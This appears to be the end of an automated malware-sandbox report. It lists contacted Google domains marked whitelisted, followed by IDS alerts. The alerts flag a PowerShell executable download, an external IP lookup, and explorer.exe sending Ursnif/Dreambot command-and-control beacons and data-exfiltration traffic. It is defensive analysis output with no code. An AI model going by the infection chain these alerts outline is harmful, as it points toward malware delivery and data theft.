apis.google.com 172.217.18.14
whitelisted
chrome.google.com 172.217.16.206
whitelisted
clients2.google.com 216.58.206.14
whitelisted
redirector.gvt1.com 172.217.16.206
whitelisted
ssl.google-analytics.com 172.217.22.8
whitelisted
r6---sn-5uh5o-f5fd.gvt1.com 194.9.24.113
whitelisted
safebrowsing.googleapis.com 172.217.16.202
whitelisted
fonts.gstatic.com 172.217.23.163
whitelisted
lh3.googleusercontent.com 172.217.23.129
whitelisted
stats.g.doubleclick.net 74.125.71.154
74.125.71.156
74.125.71.157
74.125.71.155
whitelisted

Threats

PID Process Class Message
4056 powershell.exe Potential Corporate Privacy Violation ET POLICY PE EXE or DLL Windows file download HTTP
2940 nslookup.exe Potential Corporate Privacy Violation ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
2940 nslookup.exe Potential Corporate Privacy Violation ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
252 explorer.exe A Network Trojan was detected ET TROJAN Ursnif Variant CnC Beacon
252 explorer.exe A Network Trojan was detected MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
252 explorer.exe A Network Trojan was detected MALWARE [PTsecurity] W32.Dreambot HTTP
252 explorer.exe A Network Trojan was detected ET TROJAN Ursnif Variant CnC Data Exfil
252 explorer.exe A Network Trojan was detected MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
252 explorer.exe A Network Trojan was detected MALWARE [PTsecurity] W32.Dreambot HTTP

4 ETPRO signatures available at the full report

Debug output strings

No debug info.